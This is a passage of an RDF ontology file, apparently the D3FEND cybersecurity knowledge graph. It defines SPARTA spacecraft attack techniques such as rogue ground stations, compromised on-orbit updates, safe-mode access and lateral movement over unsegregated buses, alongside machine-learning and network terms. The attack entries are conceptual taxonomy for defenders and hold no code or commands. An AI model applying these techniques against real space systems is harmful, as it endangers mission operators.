some sort of lateral movement potential." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAInitialAccessTechnique ; skos:prefLabel "Compromise Hosted Payload" . d3f:IA-0007.01 a owl:Class ; rdfs:label "Compromise On-Orbit Update - SPARTA" ; d3f:attack-id "IA-0007.01" ; d3f:definition "Threat actors may manipulate and modify on-orbit updates before they are sent to the target spacecraft. This attack can be done in a number of ways, including manipulation of source code, manipulating environment variables, on-board table/memory values, or replacing compiled versions with a malicious one." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0007 ; skos:prefLabel "Compromise On-Orbit Update" . d3f:IA-0007.02 a owl:Class ; rdfs:label "Malicious Commanding via Valid GS - SPARTA" ; d3f:attack-id "IA-0007.02" ; d3f:definition "Threat actors may compromise target owned ground systems components (e.g., front end processors, command and control software, etc.) that can be used for future campaigns or to perpetuate other techniques. These ground systems components have already been configured for communications to the victim spacecraft. By compromising this infrastructure, threat actors can stage, launch, and execute an operation. Threat actors may utilize these systems for various tasks, including Execution and Exfiltration." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0007 ; skos:prefLabel "Malicious Commanding via Valid GS" . d3f:IA-0008.01 a owl:Class ; rdfs:label "Rogue Ground Station - SPARTA" ; d3f:attack-id "IA-0008.01" ; d3f:definition "Threat actors may gain access to a victim spacecraft through the use of a rogue ground system. With this technique, the threat actor does not need access to a legitimate ground station or communication site." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0008 ; skos:prefLabel "Rogue Ground Station" . d3f:IA-0008.02 a owl:Class ; rdfs:label "Rogue Spacecraft - SPARTA" ; d3f:attack-id "IA-0008.02" ; d3f:definition "Threat actors may gain access to a target spacecraft using their own spacecraft that has the capability to maneuver within close proximity to a target spacecraft to carry out a variety of TTPs (i.e., eavesdropping, side-channel, etc.). Since many of the commercial and military assets in space are tracked, and that information is publicly available, attackers can identify the location of space assets to infer the best positioning for intersecting orbits. Proximity operations support avoidance of the larger attenuation that would otherwise affect the signal when propagating long distances, or environmental circumstances that may present interference." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0008 ; skos:prefLabel "Rogue Spacecraft" . d3f:IA-0008.03 a owl:Class ; rdfs:label "ASAT/Counterspace Weapon - SPARTA" ; d3f:attack-id "IA-0008.03" ; d3f:definition """Threat actors may utilize counterspace platforms to access/impact spacecraft. These counterspace capabilities vary significantly in the types of effects they create, the level of technological sophistication required, and the level of resources needed to develop and deploy them. These diverse capabilities also differ in how they are employed and how easy they are to detect and attribute and the permanence of the effects they have on their target.* *https://aerospace.csis.org/aerospace101/counterspace-weapons-101""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0008 ; skos:prefLabel "ASAT/Counterspace Weapon" . d3f:IA-0009.01 a owl:Class ; rdfs:label "Mission Collaborator (academia, international, etc.) - SPARTA" ; d3f:attack-id "IA-0009.01" ; d3f:definition "Threat actors may seek to exploit mission partners to gain an initial foothold for pivoting into the mission environment and eventually impacting the spacecraft. The complex nature of many space systems rely on contributions across organizations, including academic partners and even international collaborators. These organizations will undoubtedly vary in their system security posture and attack surface." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0009 ; skos:prefLabel "Mission Collaborator (academia, international, etc.)" . d3f:IA-0009.02 a owl:Class ; rdfs:label "Vendor - SPARTA" ; d3f:attack-id "IA-0009.02" ; d3f:definition "Threat actors may target the trust between vendors and the target spacecraft. Missions often grant elevated access to vendors in order to allow them to manage internal systems as well as cloud-based environments. The vendor's access may be intended to be limited to the infrastructure being maintained but it may provide laterally movement into the target spacecraft. Attackers may leverage security weaknesses in the vendor environment to gain access to more critical mission resources or network locations. In the spacecraft context vendors may have direct commanding and updating capabilities outside of the primary communication channel." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0009 ; skos:prefLabel "Vendor" . d3f:IA-0009.03 a owl:Class ; rdfs:label "User Segment - SPARTA" ; d3f:attack-id "IA-0009.03" ; d3f:definition "Threat actors can target the user segment in an effort to laterally move into other areas of the end-to-end mission architecture. When user segments are interconnected, threat actors can exploit lack of segmentation as the user segment's security undoubtedly varies in their system security posture and attack surface than the primary space mission. The user equipment and users themselves provide ample attack surface as the human element and their vulnerabilities (i.e., social engineering, phishing, iOT) are often the weakest security link and entry point into many systems." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0009 ; skos:prefLabel "User Segment" . d3f:IA-0010 a owl:Class ; rdfs:label "Unauthorized Access During Safe-Mode - SPARTA" ; d3f:attack-id "IA-0010" ; d3f:definition "Threat actors may target a spacecraft in safe mode to establish initial access, taking advantage of reduced authentication, relaxed command filtering, or backup control pathways. Safe-mode is when all non-essential systems are shut down and only essential functions within the spacecraft are active. Since safe mode often prioritizes availability and fault recovery over security, it may process commands that would otherwise be rejected in nominal operations. This condition can provide an entry point into mission operations if improperly protected." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAInitialAccessTechnique ; skos:prefLabel "Unauthorized Access During Safe-Mode" . d3f:IA-0011 a owl:Class ; rdfs:label "Auxiliary Device Compromise - SPARTA" ; d3f:attack-id "IA-0011" ; d3f:definition "Threat actors may exploit the auxiliary/peripheral devices that get plugged into spacecrafts. It is no longer atypical to see spacecrafts, especially CubeSats, with Universal Serial Bus (USB) ports or other ports where auxiliary/peripheral devices can be plugged in. Threat actors can execute malicious code on the spacecrafts by copying the malicious code to auxiliary/peripheral devices and taking advantage of logic on the spacecraft to execute code on these devices. This may occur through manual manipulation of the auxiliary/peripheral devices, modification of standard IT systems used to initially format/create the auxiliary/peripheral device, or modification to the auxiliary/peripheral devices' firmware itself." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAInitialAccessTechnique ; skos:prefLabel "Auxiliary Device Compromise" . d3f:IA-0012 a owl:Class ; rdfs:label "Assembly, Test, and Launch Operation Compromise - SPARTA" ; d3f:attack-id "IA-0012" ; d3f:definition "Threat actors may target the spacecraft hardware and/or software while the spacecraft is at Assembly, Test, and Launch Operation (ATLO). ATLO is often the first time pieces of the spacecraft are fully integrated and exchanging data across interfaces. Malware could propagate from infected devices across the integrated spacecraft. For example, test equipment (i.e., transient cyber asset) is often brought in for testing elements of the spacecraft. Additionally, varying levels of physical security is in place which may be a reduction in physical security typically seen during development. The ATLO environment should be considered a viable attack vector and the appropriate/equivalent security controls from the primary development environment should be implemented during ATLO as well." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAInitialAccessTechnique ; skos:prefLabel "Assembly, Test, and Launch Operation Compromise" . d3f:IA-0013 a owl:Class ; rdfs:label "Compromise Host Spacecraft - SPARTA" ; d3f:attack-id "IA-0013" ; d3f:definition "The inverse of IA-0006, this technique describes adversaries that are targeting a hosted payload, the host space vehicle (SV) can serve as an initial access vector to compromise the payload through vulnerabilities in the SV's onboard systems, communication interfaces, or software. If the SV's command and control systems are exploited, an attacker could gain unauthorized access to the vehicle's internal network. Once inside, the attacker may laterally move to the hosted payload, particularly if it shares data buses, processors, or communication links with the vehicle." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAInitialAccessTechnique ; skos:prefLabel "Compromise Host Spacecraft" . d3f:ID3 a owl:Class, owl:NamedIndividual ; rdfs:label "ID3" ; d3f:d3fend-id "D3A-ID3" ; d3f:definition "ID3 stands for Iterative Dichotomiser 3 and is named such because the algorithm iteratively (repeatedly) dichotomizes(divides) features into two or more groups at each step." ; d3f:kb-article """## Addtional Consiterations ID3 is the basis of C4.5, and is best used in natural language processing. ## References Decision Trees for Classification: ID3 Algorithm Explained. Towards Data Science. [Link](https://towardsdatascience.com/decision-trees-for-classification-id3-algorithm-explained-89df76e72df1).""" ; rdfs:subClassOf d3f:DecisionTree . d3f:IMP-0001 a owl:Class ; rdfs:label "Deception (or Misdirection) - SPARTA" ; d3f:attack-id "IMP-0001" ; d3f:definition "Measures designed to mislead an adversary by manipulation, distortion, or falsification of evidence or information into a system to induce the adversary to react in a manner prejudicial to their interests. Threat actors may seek to deceive mission stakeholders (or even military decision makers) for a multitude of reasons. Telemetry values could be modified, attacks could be designed to intentionally mimic another threat actor's TTPs, and even allied ground infrastructure could be compromised and used as the source of communications to the spacecraft." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAImpactTechnique ; skos:prefLabel "Deception (or Misdirection)" . d3f:IMP-0002 a owl:Class ; rdfs:label "Disruption - SPARTA" ; d3f:attack-id "IMP-0002" ; d3f:definition "Measures designed to temporarily impair the use or access to a system for a period of time. Threat actors may seek to disrupt communications from the victim spacecraft to the ground controllers or other interested parties. By disrupting communications during critical times, there is the potential impact of data being lost or critical actions not being performed. This could cause the spacecraft's purpose to be put into jeopardy depending on what communications were lost during the disruption. This behavior is different than Denial as this attack can also attempt to modify the data and messages as they are passed as a way to disrupt communications." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAImpactTechnique ; skos:prefLabel "Disruption" . d3f:IMP-0003 a owl:Class ; rdfs:label "Denial - SPARTA" ; d3f:attack-id "IMP-0003" ; d3f:definition "Measures designed to temporarily eliminate the use, access, or operation of a system for a period of time, usually without physical damage to the affected system. Threat actors may seek to deny ground controllers and other interested parties access to the victim spacecraft. This would be done exhausting system resource, degrading subsystems, or blocking communications entirely. This behavior is different from Disruption as this seeks to deny communications entirely, rather than stop them for a length of time." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAImpactTechnique ; skos:prefLabel "Denial" . d3f:IMP-0004 a owl:Class ; rdfs:label "Degradation - SPARTA" ; d3f:attack-id "IMP-0004" ; d3f:definition "Measures designed to permanently impair (either partially or totally) the use of a system. Threat actors may target various subsystems or the hosted payload in such a way to rapidly increase it's degradation. This could potentially shorten the lifespan of the victim spacecraft." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAImpactTechnique ; skos:prefLabel "Degradation" . d3f:IMP-0005 a owl:Class ; rdfs:label "Destruction - SPARTA" ; d3f:attack-id "IMP-0005" ; d3f:definition "Measures designed to permanently eliminate the use of a system, potentially through some physical damage to the system. Threat actors may destroy data, commands, subsystems, or attempt to destroy the victim spacecraft itself. This behavior is different from Degradation, as the individual parts are destroyed rather than put in a position in which they would slowly degrade over time." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAImpactTechnique ; skos:prefLabel "Destruction" . d3f:IMP-0006 a owl:Class ; rdfs:label "Theft - SPARTA" ; d3f:attack-id "IMP-0006" ; d3f:definition "Threat actors may attempt to steal the data that is being gathered, processed, and sent from the victim spacecraft. Many spacecraft have a particular purpose associated with them and the data they gather is deemed mission critical. By attempting to steal this data, the mission, or purpose, of the spacecraft could be lost entirely." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAImpactTechnique ; skos:prefLabel "Theft" . d3f:IPPhone a owl:Class ; rdfs:label "IP Phone" ; d3f:definition "A VoIP phone or IP phone uses voice over IP technologies for placing and transmitting telephone calls over an IP network, such as the Internet, instead of the traditional public switched telephone network (PSTN). Digital IP-based telephone service uses control protocols such as the Session Initiation Protocol (SIP), Skinny Client Control Protocol (SCCP) or various other proprietary protocols." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:PersonalComputer ; skos:altLabel "VoIP Phone" . d3f:ImportLibraryFunction a owl:Class, owl:NamedIndividual ; rdfs:label "Import Library Function" ; d3f:definition "Loads an external software library to enable the invocations of its methods." ; d3f:loads d3f:SharedLibraryFile ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:loads ; owl:someValuesFrom d3f:SharedLibraryFile ], d3f:Subroutine . d3f:InboundInternetEncryptedWebTraffic a owl:Class ; rdfs:label "Inbound Internet Encrypted Web Traffic" ; d3f:definition "Inbound internet web traffic is network traffic that is: (a) on an incoming connection initiated from a host outside the network to a host within a network, and (b) using a standard web encryption protocol." ; rdfs:seeAlso ; rdfs:subClassOf d3f:InboundInternetEncryptedTraffic, d3f:InboundInternetWebTraffic . d3f:InputDeviceEvent a owl:Class ; rdfs:label "Input Device Event" ; d3f:definition "An event involving human-machine interface devices, such as keyboards, mice, or touchscreens." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:InputDevice ], d3f:HardwareDeviceEvent . d3f:Instance-basedTransferLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Instance-based Transfer Learning" ; d3f:d3fend-id "D3A-IBTL" ; d3f:definition "Instance-based transfer learning methods try to reweight the samples in the source domain in an attempt to correct for marginal distribution differences. These reweighted instances are then directly used in the target domain for training." ; d3f:kb-article """## References Georgian Impact Blog. (n.d.). Transfer Learning Part 1. [Link](https://medium.com/georgian-impact-blog/transfer-learning-part-1-ed0c174ad6e7#:~:text=Homogeneous%20Transfer%20Learning-,1.,the%20target%20domain%20for%20training).""" ; rdfs:subClassOf d3f:HomogenousTransferLearning . d3f:InstantMessagingClient a owl:Class ; rdfs:label "Instant Messaging Client" ; d3f:definition "Client software used to engage in Instant Messaging, a type of online chat that offers real-time text transmission over the Internet. A LAN messenger operates in a similar way over a local area network. Short messages are typically transmitted between two parties, when each user chooses to complete a thought and select \"send\". Some IM applications can use push technology to provide real-time text, which transmits messages character by character, as they are composed. More advanced instant messaging can add file transfer, clickable hyperlinks, Voice over IP, or video chat." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:CollaborativeSoftware . d3f:IntegrationTestExecutionTool a owl:Class ; rdfs:label "Integration Test Execution Tool" ; d3f:definition "An integration test execution tool automatically performs integration testing. Integration testing (sometimes called integration and testing, abbreviated I&T) is the phase in software testing in which individual software modules are combined and tested as a group." ; rdfs:seeAlso ; rdfs:subClassOf d3f:TestExecutionTool . d3f:InternationalizedDomainName a d3f:DomainName, owl:NamedIndividual ; rdfs:label "Internationalized Domain Name" . d3f:InternetBasedAttacker a owl:Class ; rdfs:label "Internet-based Attacker" ; d3f:definition "A remote attacker who leverages the internet to conduct attacks, such as through phishing, malware, or direct network attacks." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:WideAreaNetwork ], d3f:RemoteAttacker . d3f:InternetDNSLookup a owl:Class ; rdfs:label "Internet DNS Lookup" ; d3f:definition "An internet Domain Name System (DNS) lookup is a DNS lookup made from a host on a network that is resolved after querying a DNS name server hosted on a different network." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DNSLookup . d3f:InternetFileTransferTraffic a owl:Class ; rdfs:label "Internet File Transfer Traffic" ; d3f:definition "Internet file transfer network traffic is network traffic related to file transfers between network nodes that crosses a boundary between networks. This includes only network traffic conforming to standard file transfer protocols, not custom transfer protocols." ; rdfs:subClassOf d3f:FileTransferNetworkTraffic, d3f:InternetNetworkTraffic . d3f:InternetNetwork a owl:Class ; rdfs:label "Internet Network" ; d3f:definition "A network of multiple, connected networks. Internetworking is the practice of connecting a computer network with other networks through the use of gateways that provide a common method of routing information packets between the networks. The resulting system of interconnected networks are called an internetwork, or simply an internet. Internetworking is a combination of the words inter (\"between\") and networking; not internet-working or international-network." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Network ; skos:altLabel "Interconnected Network", "Internet", "Internetwork" . d3f:InternetPersona a owl:Class ; rdfs:label "Internet Persona" ; d3f:definition "A social identity that an Internet user establishes in online communities and websites. It may also be an actively constructed presentation of oneself." ; rdfs:isDefinedBy ; rdfs:seeAlso ; rdfs:subClassOf d3f:DigitalInformationBearer ; skos:altLabel "Online Identity", "Online Persona", "Online Personality" . d3f:IntervalEstimation a owl:Class, owl:NamedIndividual ; rdfs:label "Interval Estimation" ; d3f:d3fend-id "D3A-IE" ; d3f:definition "Interval estimation is the use of sample data to estimate an interval of possible values of a parameter of interest." ; d3f:kb-article """## References Wikipedia. (n.d.). Interval estimation. [Link](https://en.wikipedia.org/wiki/Interval_estimation)""" ; rdfs:subClassOf d3f:Estimation . d3f:IntranetDNSLookup a owl:Class ; rdfs:label "Intranet DNS Lookup" ; d3f:definition "An Intranet Domain Name System (DNS) lookup is a DNS lookup made from a host on a network that is resolved after querying a DNS name server hosted on a that same network." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DNSLookup . d3f:IntranetRPCNetworkTraffic a owl:Class ; rdfs:label "Intranet RPC Network Traffic" ; d3f:definition "Intranet RPC network traffic is network traffic that does not cross a given network's boundaries and uses a standard remote procedure call (e.g., RFC 1050) protocol." ; rdfs:seeAlso , ; rdfs:subClassOf d3f:IntranetNetworkTraffic, d3f:RPCNetworkTraffic . d3f:IntrusionPreventionSystem a owl:Class ; rdfs:label "Intrusion Prevention System" ; d3f:definition """Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS), are network security appliances that monitor network or system activities for malicious activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, report it and attempt to block or stop it. Intrusion prevention systems are considered extensions of intrusion detection systems because they both monitor network traffic and/or system activities for malicious activity. The main differences are, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent or block intrusions that are detected. IPS can take such actions as sending an alarm, dropping detected malicious packets, resetting a connection or blocking traffic from the offending IP address. An IPS also can correct cyclic redundancy check (CRC) errors, defragment packet streams, mitigate TCP sequencing issues, and clean up unwanted transport and network layer options.""" ; rdfs:isDefinedBy ; rdfs:seeAlso ; rdfs:subClassOf d3f:IntrusionDetectionSystem ; skos:altLabel "IDPS", "IPS", "Intrusion Detection and Prevention System" . d3f:IsolationEvent a owl:Class, owl:NamedIndividual ; rdfs:label "Isolation Event" ; d3f:definition "An event involving actions to create logical or physical barriers that isolate compromised components, preventing adversary movement and reducing attack surfaces." ; d3f:related d3f:Isolate ; rdfs:subClassOf d3f:SecurityEvent . d3f:JavaArchive a owl:Class ; rdfs:label "Java Archive" ; d3f:definition "A JAR (Java ARchive) is a package file format typically used to aggregate many Java class files and associated metadata and resources (text, images, etc.) into one file for distribution." ; rdfs:seeAlso ; rdfs:subClassOf d3f:ArchiveFile, d3f:SoftwarePackage . d3f:K-CenterClustering a owl:Class, owl:NamedIndividual ; rdfs:label "K-Center Clustering" ; d3f:d3fend-id "D3A-KCC" ; d3f:definition "K-center Clustering is a type of clustering based on an combinatorial optimization methods. It clusters a set of points so as to minimize the maximum intercluster distance." ; d3f:kb-article """## How it works An example K-center Clustering problem is to mimimize the number of points in a set that are necessary so that a every other point in the set is within some fixed distance of those points. For instance, given n cities with specified distances, one wants to build k warehouses in different cities and minimize the maximum distance of a city to a warehouse. ## Considerations - **Scalability**: Exact solutions are NP-hard. However, algorithms that have been proven effective and create no more than 2x the optimal set of clusters can run in O(kn) proportional to k*n where k is the minimum number of clusters and n is the number of data points being clustered. ## Key Test Considerations - **Unsupervised Learning**: - **Number of Clusters**: The Gonzalez (Gon) algorithm guarantees creating no more than twice the optimal number of clusters, where the optimal number is the minimum number of clusters to minimize total distance between representative points in the clusters [1]. - **Cluster Analysis**: - **Rand Index and Adjusted Rand Index**: Given ground truth set of class labels for the data, the Rand Index is a measure of the similarity between two data clusterings. The Rand Index is the accuracy of determining if a link belongs within a cluster or not. A form of the Rand Index may be defined that is adjusted for the chance grouping of elements, this is the Adjusted Rand Index [5]. - **Adjusted Mutual Information**: Given ground truth set of class labels for the data, Adjusted Mutual Information corrects the effect of agreement solely due to chance between clusterings, similar to the way the Adjusted Rand Index corrects the Rand Index [6]. - **Connection-based Clustering**: - **Choice of Distance Metric**: The outcome can vary significantly depending on the chosen distance metric (e.g., Euclidean, Manhattan). - **Sensitivity**: Connection-based method can be sensitive to outliers, which might affect the quality of the clusters formed. - **K-center Clustering**: - **Silhouette Score**: The silhouette score refers to a scoring method that helps validate the consistency between clusters of data. The evaluation technique also produces a concise graphical representation of how well each object appear to have been classified. It is suited to K-centric Clustering in that it also works for different metric spaces. - **Distance Metric**: The distance measure must be a true metric (see [2]). Differences in the metric chosen may (e.g., Euclidean,a Manhattan) affect results significantly. - **Sensitivity**: Greedy implementations may be sensitive to outliers. ## Platforms, Tools, or Libraries N/A. _Note that this algorithm is relatively simple and so it is usually implemented from scratch by those incorporating this algorithm into a system._ ## References 1. Gonzalez, T.F. (1985). Clustering to Minimize the Maximum Intercluster Distance. Theor. Comput. Sci., 38, 293-306. [Link](https://www.sciencedirect.com/science/article/pii/0304397585902245?via%3Dihub). 1. Weisstein, Eric W. (n.d.). "Metric." From MathWorld--A Wolfram Web Resource. [Link](https://mathworld.wolfram.com/Metric.html). 1. Wikipedia. (8 Aug 2023). Metric k-center [Link](https://en.wikipedia.org/wiki/Metric_k-center). 1. Wikipedia. (14 Aug 2023). Vertex k-center problem. [Link](https://en.wikipedia.org/wiki/Vertex_k-center_problem). 1. Wikipedia. (n.d.). Rand Index. [Link](https://en.wikipedia.org/wiki/Rand_index). 1. Wikipedia. (n.d.). Adjusted Mutual Information. [Link](https://en.wikipedia.org/wiki/Adjusted_mutual_information). 1. Wikipedia. (1 Aug 2023). Silhouette (clustering). [Link](https://en.wikipedia.org/wiki/Silhouette_(clustering)).""" ; rdfs:subClassOf d3f:Graph-basedClustering . d3f:K-FoldCross-Validation a owl:Class, owl:NamedIndividual ; rdfs:label "K-Fold Cross-Validation" ; d3f:d3fend-id "D3A-KFCV" ; d3f:definition "Cross-validation is a resampling procedure used to evaluate machine learning models on a limited data sample. The procedure has a single parameter called k that refers to the number of groups that a given data sample is to be split into. As such, the procedure is often called k-fold cross-validation. When a specific value for k is chosen, it may be used in place of k in the reference to the model, such as k=10 becoming 10-fold cross-validation" ; d3f:kb-article """## References K-Fold Cross-Validation. Machine Learning Mastery. [Link](https://machinelearningmastery.com/k-fold-cross-validation/#:~:text=Cross%2Dvalidation%20is%20a%20resampling,k%2Dfold%20cross%2Dvalidation).""" ; rdfs:subClassOf d3f:ResamplingEnsemble . d3f:K-NearestNeighbors a owl:Class, owl:NamedIndividual ; rdfs:label "K-Nearest Neighbors" ; d3f:d3fend-id "D3A-KNN" ; d3f:definition "The k-nearest neighbors algorithm, also known as KNN or k-NN, is a non-parametric, supervised learning classifier, which uses proximity to make classifications or predictions about the grouping of an individual data point." ; d3f:kb-article """## **How it works** The goal of the k-nearest neighbor algorithm is to identify the nearest neighbors of a given query point, so that we can assign a class label to that point. To determine which data points are closest to a given query point, the distance between the query point and the other data points will need to be calculated. The distance measures used can vary depending on the data set or implementation and help inform decision boundaries, which query points into different regions. Then, by defining the k-value (the number of neighbors to be checked to determine the classification of a specific query point), the data can be assigned its class label. For classification problems, a class label is assigned on the basis of a majority vote—i.e. the label that is most frequently represented around a given data point is used (the term “majority vote” is commonly used in literature, however, the technique is more technically considered “plurality voting”). Regression problems use a similar concept as classification problem, but in this case, the average the k nearest neighbors is taken to make a prediction about a classification. The main distinction here is that classification is used for discrete values, whereas regression is used with continuous ones. Unlike other algorithms that explicitly model the problem, such as linear regression, KNN is instance-based. It means that the algorithm doesn't explicitly learn a model. Instead, it memorizes the training instances and uses them as "knowledge" for the prediction phase. It's also worth noting that the KNN algorithm is also part of a family of “lazy learning” models, meaning that it only stores a training dataset versus undergoing a training stage. ## **Considerations** * **Scaling:** Scaling is a problem as KNN is a lazy algorithm and takes up more memory and storage compared to other classification methods. * **Implementation and Hyperparameters:** As KNN only requires a k-value and a distance metric, it is often an easy implementation and can adjust will to new training data. ## Key Test Considerations - **Supervised Learning:** - **Cross Validation:** As cross validation methods like k-fold, leave-one-out, and stratified cross validation can help validate model performance. However, nuances like pessimism bias in k-fold cross validation or high variability in leave-one-out cross validation may need consideration. - **Classification:** - **ROC Curve:** A standard technique used to summarize classifier performance over a range of tradeoffs between true and false positives is the Receiver Operating Characteristic (ROC) curve. - **Data Imbalance:** Imbalanced data sets where one class significantly outnumbers others, under sampling techniques like SMOTE may be beneficial in sampling minority classes. - **K-Nearest Neighbor** - **Choice of K:** The number of neighbors, K, affects the decision boundary. A smaller K can lead to a noisy decision boundary, while a large K can smooth it out, but may also blur class distinctions. - **K-d Tree:** Exact searching on large datasets can be computationally costly and inefficient. Implementing approximate nearest neighbor algorithms like the K-d tree algorithm. - **Dimensionality:** KNN does not perform well while using high-dimensional data and can be sensitive to irrelevant features which can lead to overfitting. - **Distance Metric:** Choosing the appropriate distance metric (Euclidean, Manhattan, MinKowski, Hamming etc.) is essential, based on the nature of the data. ## **References** 1. IBM. K-Nearest Neighbors Algorithm. [Link](https://www.ibm.com/topics/knn?mhsrc=ibmsearch_a&mhq=k-nearest%20neighbors%20). 2. Muja, M., & Lowe, D. G. (2014). Scalable nearest neighbor algorithms for high dimensional data. IEEE Transactions on Pattern Analysis and Machine Intelligence. [Link]( https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=6809191). 3. Chawla, N. V., Bowyer, K. W., Hall, L. O., & Kegelmeyer, W. P. (2002). SMOTE: synthetic minority over-sampling technique. Journal of artificial intelligence research, 16, 321-357. [Link]( https://www.jair.org/index.php/jair/article/view/10302/24590). 4. Kohavi, R. (1995). A study of cross-validation and bootstrap for accuracy estimation and model selection. Proceedings of the 14th international joint conference on Artificial intelligence . [Link]( https://www.ijcai.org/Proceedings/95-2/Papers/016.pdf).""" ; rdfs:subClassOf d3f:Classification . d3f:K-meansClustering a owl:Class, owl:NamedIndividual ; rdfs:label "K-means Clustering" ; d3f:d3fend-id "D3A-KMC" ; d3f:definition "K-means algorithm identifies k number of centroids, and then allocates every data point to the nearest cluster, while keeping the centroids as small as possible." ; d3f:kb-article """## References Towards Data Science. (n.d.). Understanding K-means Clustering in Machine Learning. [Link](https://towardsdatascience.com/understanding-k-means-clustering-in-machine-learning-6a6e67336aa1)""" ; rdfs:subClassOf d3f:Centroid-basedClustering . d3f:KendallsRankCorrelationCoefficient a owl:Class, owl:NamedIndividual ; rdfs:label "Kendall's Rank Correlation Coefficient" ; d3f:d3fend-id "D3A-KRCC" ; d3f:definition "Kendall's $\\\\tau$ between and is given by $(n_c - n_d) / \\\\sqrt((n_c+n_d+n_x)(n_c+n_d+n_y)$, where is the number of concordant pairs of observations, is the number of discordant pairs, is the number of ties involving only the variable, and is the number of ties involving only the variable.\" ;" ; d3f:kb-article """## References 1. Wolfram Research. (2012). KendallTau. Wolfram Language function. [Link](https://reference.wolfram.com/language/ref/KendallTau.html) 1. Kendall's Tau. (2023, May 23). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Kendall_rank_correlation_coefficient]\"\"\",""" ; d3f:synonym "Kendall's Tau Coefficient" ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:RankCorrelationCoefficient . d3f:KerberosTicketGrantingServiceTicket a owl:Class ; rdfs:label "Kerberos Ticket Granting Service Ticket" ; d3f:definition "A Kerberos ticket-granting service (TGS) ticket is given in response to requesting a Kerberos TGS request." ; rdfs:subClassOf d3f:KerberosTicket ; skos:altLabel "TGS Ticket" . d3f:KerberosTicketGrantingTicketAccount a owl:Class, owl:NamedIndividual ; rdfs:label "Kerberos Ticket Granting Ticket Account" ; d3f:creates d3f:KerberosTicketGrantingTicket ; d3f:definition "KRBTGT is an account used by Key Distribution Center (KDC) service to issue Ticket Granting Tickets (TGTs) as part of the Kerberos authentication protocol." ; d3f:synonym "krbtgt" ; rdfs:seeAlso ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:creates ; owl:someValuesFrom d3f:KerberosTicketGrantingTicket ], d3f:ServiceAccount . d3f:KernelAPISensor a owl:Class, owl:NamedIndividual ; rdfs:label "Kernel API Sensor" ; d3f:definition "Monitors system calls (operating system api functions)." ; d3f:monitors d3f:SystemCall ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:monitors ; owl:someValuesFrom d3f:SystemCall ], d3f:EndpointSensor . d3f:KernelModuleUnloadEvent a owl:Class ; rdfs:label "Kernel Module Unload Event" ; d3f:definition "An event representing the removal of a kernel module from the operating system kernel, deallocating resources and potentially altering system functionality." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:KernelModuleLoadEvent ], [ a owl:Restriction ; owl:onProperty d3f:precedes ; owl:someValuesFrom d3f:MemoryDeletionEvent ], d3f:KernelModuleEvent . d3f:KioskComputer a owl:Class ; rdfs:label "Kiosk Computer" ; d3f:definition "An interactive kiosk is a computer terminal featuring specialized hardware and software that provides access to information and applications for communication, commerce, entertainment, or education. Early interactive kiosks sometimes resembled telephone booths, but have been embraced by retail, food service and hospitality to improve customer service and streamline operations. Interactive kiosks are typically placed in high foot traffic settings such as shops, hotel lobbies or airports." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:SharedComputer ; skos:altLabel "Interactive Kiosk" . d3f:LDIFRecord a d3f:UserAccount, owl:NamedIndividual ; rdfs:label "LDIF Record" . d3f:LM-0001 a owl:Class ; rdfs:label "Hosted Payload - SPARTA" ; d3f:attack-id "LM-0001" ; d3f:definition "Threat actors may use the hosted payload within the victim spacecraft in order to gain access to other subsystems. The hosted payload often has a need to gather and send data to the internal subsystems, depending on its purpose. Threat actors may be able to take advantage of this communication in order to laterally move to the other subsystems and have commands be processed." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTALateralMovementTechnique ; skos:prefLabel "Hosted Payload" . d3f:LM-0002 a owl:Class ; rdfs:label "Exploit Lack of Bus Segregation - SPARTA" ; d3f:attack-id "LM-0002" ; d3f:definition "Threat actors may exploit victim spacecraft on-board flat architecture for lateral movement purposes. Depending on implementation decisions, spacecraft can have a completely flat architecture where remote terminals, sub-systems, payloads, etc. can all communicate on the same main bus without any segmentation, authentication, etc. Threat actors can leverage this poor design to send specially crafted data from one compromised devices or sub-system. This could enable the threat actor to laterally move to another area of the spacecraft or escalate privileges (i.e., bus master, bus controller)" ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTALateralMovementTechnique ; skos:prefLabel "Exploit Lack of Bus Segregation" . d3f:LM-0003 a owl:Class ; rdfs:label "Constellation Hopping via Crosslink - SPARTA" ; 